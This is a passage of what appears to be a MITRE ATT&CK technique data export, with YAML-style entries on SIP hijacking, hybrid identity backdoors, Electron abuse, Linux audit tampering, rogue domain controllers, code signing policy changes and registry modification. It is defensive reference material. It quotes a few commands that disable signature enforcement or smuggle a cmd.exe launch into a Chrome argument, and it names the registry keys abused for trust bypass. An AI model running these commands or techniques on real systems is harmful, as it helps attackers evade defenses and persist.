Retrieved January 31, 2018. 
url: https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:48.200Z' name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking' description: |- Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017) Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). 
(Citation: SpectorOps Subverting Trust Sept 2017) Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017) * Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file). * Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). 
This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk. * Modifying the DLL and Function Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex). * **Note:** The above hijacks are also possible without modifying the Registry via [DLL](https://attack.mitre.org/techniques/T1574/001) search order hijacking. Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. 
(Citation: SpectorOps Subverting Trust Sept 2017) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Matt Graeber, @mattifestation, SpecterOps x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.1' identifier: T1553.003 atomic_tests: [] T1556.007: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f created: '2022-09-28T13:29:53.354Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1556/007 external_id: T1556.007 - source_name: Azure AD Connect for Read Teamers description: Adam Chester. (2019, February 18). Azure AD Connect for Red Teamers. Retrieved September 28, 2022. url: https://blog.xpnsec.com/azuread-connect-for-redteam/ - source_name: AADInternals Azure AD On-Prem to Cloud description: 'Dr. Nestori Syynimaa. (2020, July 13). Unnoticed sidekick: Getting access to cloud as an on-prem admin. Retrieved September 28, 2022.' url: https://o365blog.com/post/on-prem_admin/ - source_name: MagicWeb description: 'Microsoft Threat Intelligence Center, Microsoft Detection and Response Team, Microsoft 365 Defender Research Team . (2022, August 24). MagicWeb: NOBELIUM’s post-compromise trick to authenticate as anyone. Retrieved September 28, 2022.' url: https://www.microsoft.com/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/ - source_name: Azure AD Hybrid Identity description: Microsoft. (2022, August 26). Choose the right authentication method for your Azure Active Directory hybrid identity solution. Retrieved September 28, 2022. 
url: https://learn.microsoft.com/en-us/azure/active-directory/hybrid/choose-ad-authn - source_name: Mandiant Azure AD Backdoors description: Mike Burns. (2020, September 30). Detecting Microsoft 365 and Azure Active Directory Backdoors. Retrieved September 28, 2022. url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T22:40:10.913Z' name: Hybrid Identity description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts. \n\nMany organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Microsoft Entra ID includes three options for synchronizing identities between Active Directory and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Entra ID, allowing authentication to Entra ID to take place entirely in the cloud \n* Pass Through Authentication (PTA), in which Entra ID authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory \n* Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Entra ID \n\nAD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges. 
\n\nBy modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Entra ID, as well as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation: AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Entra ID tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Entra ID environment as any user.(Citation: Mandiant Azure AD Backdoors)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: persistence x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Praetorian x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows - SaaS - IaaS - Office Suite - Identity Provider x_mitre_version: '1.1' atomic_tests: [] T1218.015: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3 created: '2024-03-07T19:32:35.383Z' created_by_ref: 
identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1218/015 external_id: T1218.015 - source_name: Electron 3 description: Alanna Titterington. (2023, September 14). Security of Electron-based desktop applications. Retrieved March 7, 2024. url: https://www.kaspersky.com/blog/electron-framework-security-issues/49035/ - source_name: Electron Security description: ElectronJS.org. (n.d.). Retrieved March 7, 2024. url: https://www.electronjs.org/docs/latest/tutorial/using-native-node-modules - source_name: Electron 6-8 description: Kosayev, U. (2023, June 15). One Electron to Rule Them All. Retrieved March 7, 2024. url: https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf - source_name: Electron 1 description: TOM ABAI. (2023, August 10). There’s a New Stealer Variant in Town, and It’s Using Electron to Stay Fully Undetected. Retrieved March 7, 2024. url: https://www.mend.io/blog/theres-a-new-stealer-variant-in-town-and-its-using-electron-to-stay-fully-undetected/ - source_name: Electron 2 description: Trend Micro. (2023, June 6). Abusing Electronbased applications in targeted attacks. Retrieved March 7, 2024. url: https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLP-CLEAR-Horejsi-Abusing-Electron-Based-Applications-in-Targeted-Attacks.pdf object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T22:24:54.174Z' name: Electron Applications description: |- Adversaries may abuse components of the Electron framework to execute malicious code. 
The Electron framework hosts many common applications such as Signal, Slack, and Microsoft Teams.(Citation: Electron 2) Originally developed by GitHub, Electron is a cross-platform desktop application development framework that employs web technologies like JavaScript, HTML, and CSS.(Citation: Electron 3) The Chromium engine is used to display web content and Node.js runs the backend code.(Citation: Electron 1) Due to the functional mechanics of Electron (such as allowing apps to run arbitrary commands), adversaries may also be able to perform malicious functions in the background, potentially disguised as legitimate tools within the framework.(Citation: Electron 1) For example, the abuse of `teams.exe` and `chrome.exe` may allow adversaries to execute malicious commands as child processes of the legitimate application (e.g., `chrome.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c calc.exe"`).(Citation: Electron 6-8) Adversaries may also execute malicious content by planting malicious [JavaScript](https://attack.mitre.org/techniques/T1059/007) within Electron applications.(Citation: Electron Security) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Debabrata Sharma x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.0' atomic_tests: [] T1562.012: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--562e9b64-7239-493d-80f4-2bff900d9054 created: '2023-05-24T19:03:03.855Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1562/012 external_id: T1562.012 - source_name: IzyKnows auditd threat detection 2022 description: IzySec. 
(2022, January 26). Linux auditd for Threat Detection. Retrieved September 29, 2023. url: https://izyknows.medium.com/linux-auditd-for-threat-detection-d06c8b941505 - source_name: Red Hat System Auditing description: Jahoda, M. et al. (2017, March 14). Red Hat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017. url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing - source_name: ESET Ebury Feb 2014 description: M.Léveillé, M. (2014, February 21). An In-depth Analysis of Linux/Ebury. Retrieved April 19, 2019. url: https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/ - source_name: Trustwave Honeypot SkidMap 2023 description: 'Radoslaw Zdonczyk. (2023, July 30). Honeypot Recon: New Variant of SkidMap Targeting Redis. Retrieved September 29, 2023.' url: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-new-variant-of-skidmap-targeting-redis/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T22:20:10.121Z' name: 'Impair Defenses: Disable or Modify Linux Audit System' description: |- Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules. The system is often referred to as `auditd`, the name of the daemon that writes events to disk; the daemon's behavior is governed by the parameters set in the `audit.conf` configuration file. 
Two primary ways to configure the log generation rules are through the command-line `auditctl` utility and the file `/etc/audit/audit.rules`, which contains a sequence of `auditctl` commands loaded at boot time.(Citation: Red Hat System Auditing)(Citation: IzyKnows auditd threat detection 2022) With root privileges, adversaries may be able to ensure their activity is not logged by disabling the Audit system service, editing the configuration/rule files, or hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service by killing processes associated with the `auditd` daemon or by using `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging, or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files so that malicious activity is ignored.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Tim (Wadhwa-)Brown x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux x_mitre_version: '1.0' identifier: T1562.012 atomic_tests: [] T1207: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--564998d8-ab3e-4123-93fb-eccaa6b9714a created: '2018-04-18T17:59:24.739Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1207 external_id: T1207 - source_name: DCShadow Blog description: Delpy, B. & LE TOUX, V. (n.d.). DCShadow. Retrieved March 20, 2018. url: https://www.dcshadow.com/ - source_name: Adsecurity Mimikatz Guide description: Metcalf, S. (2015, November 13). Unofficial Guide to Mimikatz & Command Reference. 
Retrieved December 23, 2015. url: https://adsecurity.org/?page_id=1821 - source_name: GitHub DCSYNCMonitor description: Spencer S. (2018, February 22). DCSYNCMonitor. Retrieved March 30, 2018. url: https://github.com/shellster/DCSYNCMonitor - source_name: Microsoft DirSync description: Microsoft. (n.d.). Polling for Changes Using the DirSync Control. Retrieved March 30, 2018. url: https://msdn.microsoft.com/en-us/library/ms677626.aspx - source_name: ADDSecurity DCShadow Feb 2018 description: Lucand, G. (2018, February 18). Detect DCShadow, impossible? Retrieved March 30, 2018. url: https://adds-security.blogspot.fr/2018/02/detecter-dcshadow-impossible.html object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:48.823Z' name: Rogue Domain Controller description: |- Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC.(Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys. Registering a rogue DC involves creating new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash.(Citation: Adsecurity Mimikatz Guide) This technique may bypass system logging and security monitors such as security information and event management (SIEM) products, since actions taken on a rogue DC may not be reported to these sensors.(Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. 
Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Vincent Le Toux x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.2' identifier: T1207 atomic_tests: [] T1553.006: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c created: '2021-04-23T01:04:57.161Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1553/006 external_id: T1553.006 - source_name: Apple Disable SIP description: Apple. (n.d.). Disabling and Enabling System Integrity Protection. Retrieved April 22, 2021. url: https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection - source_name: F-Secure BlackEnergy 2014 description: 'F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.' url: https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf - source_name: FireEye HIKIT Rootkit Part 2 description: 'Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved November 17, 2024.' 
url: https://web.archive.org/web/20210920172620/https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html - source_name: Microsoft Unsigned Driver Apr 2017 description: Microsoft. (2017, April 20). Installing an Unsigned Driver during Development and Test. Retrieved April 22, 2021. url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test - source_name: Microsoft DSE June 2017 description: Microsoft. (2017, June 1). Digital Signatures for Kernel Modules on Windows. Retrieved April 22, 2021. url: https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN - source_name: Microsoft TESTSIGNING Feb 2021 description: Microsoft. (2021, February 15). Enable Loading of Test Signed Drivers. Retrieved April 22, 2021. url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option - source_name: Unit42 AcidBox June 2020 description: 'Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.' url: https://unit42.paloaltonetworks.com/acidbox-rare-malware/ - source_name: GitHub Turla Driver Loader description: TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved April 22, 2021. url: https://github.com/hfiref0x/TDL object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:48.927Z' name: 'Subvert Trust Controls: Code Signing Policy Modification' description: "Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. 
Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. \n\nSome of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)\n\nAdversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include `bcdedit.exe -set TESTSIGNING ON` on Windows and `csrutil disable` on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require a reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (e.g., a watermark in the corner of the screen stating the system is in Test Mode). 
Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)\n\nTo gain access to kernel memory to modify variables related to signature checks, such as modifying g_CiOptions to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Abel Morales, Exabeam x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows - macOS x_mitre_version: '1.1' identifier: T1553.006 atomic_tests: [] T1610: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--56e0d8b8-3e25-49dd-9050-3aa252f5aa92 created: '2021-03-29T16:51:26.020Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1610 external_id: T1610 - source_name: AppSecco Kubernetes Namespace Breakout 2020 description: Abhisek Datta. (2020, March 18). Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1. Retrieved January 16, 2024. url: https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216 - source_name: Aqua Build Images on Hosts description: 'Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021.' url: https://blog.aquasec.com/malicious-container-image-docker-container-host - source_name: Docker Containers API description: Docker. (n.d.). Docker Engine API v1.41 Reference - Container. Retrieved March 29, 2021. 
url: https://docs.docker.com/engine/api/v1.41/#tag/Container - source_name: Kubernetes Workload Management description: Kubernetes. (n.d.). Workload Management. Retrieved March 28, 2024. url: https://kubernetes.io/docs/concepts/workloads/controllers/ - source_name: Kubeflow Pipelines description: The Kubeflow Authors. (n.d.). Overview of Kubeflow Pipelines. Retrieved March 29, 2021. url: https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/ - source_name: Kubernetes Dashboard description: The Kubernetes Authors. (n.d.). Kubernetes Web UI (Dashboard). Retrieved March 29, 2021. url: https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:49.017Z' name: Deploy a container description: |- Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020) Containers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow. 
(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes.(Citation: Kubernetes Workload Management) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: execution x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Pawan Kinger, @kingerpawan, Trend Micro - Alfredo Oliveira, Trend Micro - Idan Frimark, Cisco - Center for Threat-Informed Defense (CTID) - Magno Logan, @magnologan, Trend Micro - Ariel Shuper, Cisco - Vishwas Manral, McAfee - Yossi Weizman, Azure Defender Research Team - Joas Antonio dos Santos, @C0d3Cr4zy x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Containers x_mitre_version: '1.4' identifier: T1610 atomic_tests: [] T1112: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4 created: '2017-05-31T21:31:23.587Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1112 external_id: T1112 - source_name: CISA Russian Gov Critical Infra 2018 description: CISA. (2018, March 16). Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved March 24, 2025. 
url: https://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors - source_name: CISA LockBit 2023 description: 'CISA. (2023, March 16). #StopRansomware: LockBit 3.0. Retrieved March 24, 2025.' url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a - source_name: Avaddon Ransomware 2021 description: 'Javier Yuste and Sergio Pastrana. (2021). Avaddon ransomware: an in-depth analysis and decryption of infected systems. Retrieved March 24, 2025.' url: https://arxiv.org/pdf/2102.04796 - source_name: Microsoft BlackCat Jun 2022 description: Microsoft Defender Threat Intelligence. (2022, June 13). The many lives of BlackCat ransomware. Retrieved December 20, 2022. url: https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/ - source_name: Microsoft Reg description: Microsoft. (2012, April 17). Reg. Retrieved May 1, 2015. url: https://technet.microsoft.com/en-us/library/cc732643.aspx - source_name: Microsoft Remote description: Microsoft. (n.d.). Enable the Remote Registry Service. Retrieved May 1, 2015. url: https://technet.microsoft.com/en-us/library/cc754820.aspx - source_name: Microsoft 4657 APR 2017 description: 'Miroshnikov, A. & Hall, J. (2017, April 18). 4657(S): A registry value was modified. Retrieved August 9, 2018.' url: https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657 - source_name: SpectorOps Hiding Reg Jul 2017 description: Reitz, B. (2017, July 14). Hiding Registry keys with PSReflect. Retrieved August 9, 2018. url: https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353 - source_name: Microsoft Reghide NOV 2006 description: Russinovich, M. & Sharkey, K. (2006, January 10). Reghide. Retrieved August 9, 2018. url: https://docs.microsoft.com/sysinternals/downloads/reghide - source_name: Microsoft RegDelNull July 2016 description: Russinovich, M. & Sharkey, K. 
(2016, July 4). RegDelNull v1.11. Retrieved August 10, 2018. url: https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull - source_name: TrendMicro POWELIKS AUG 2014 description: 'Santos, R. (2014, August 1). POWELIKS: Malware Hides In Windows Registry. Retrieved August 9, 2018.' url: https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/ - source_name: Unit42 BabyShark Feb 2019 description: Unit 42. (2019, February 22). New BabyShark Malware Targets U.S. National Security Think Tanks. Retrieved October 7, 2019. url: https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:49.294Z' name: Modify Registry description: |- Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution. Access to specific areas of the Registry depends on account permissions, with some keys requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification.(Citation: Microsoft Reg) Other tools, such as remote access tools, may also contain functionality to interact with the Registry through the Windows API. 
The Registry may be modified in order to hide configuration information or malicious payloads via [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).(Citation: Unit42 BabyShark Feb 2019)(Citation: Avaddon Ransomware 2021)(Citation: Microsoft BlackCat Jun 2022)(Citation: CISA Russian Gov Critical Infra 2018) The Registry may also be modified to [Impair Defenses](https://attack.mitre.org/techniques/T1562), such as by enabling macros for all Microsoft Office products, allowing privilege escalation without alerting the user, increasing the maximum number of allowed outbound requests, and/or modifying systems to store plaintext credentials in memory.(Citation: CISA LockBit 2023)(Citation: Unit42 BabyShark Feb 2019) The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system.(Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication. 
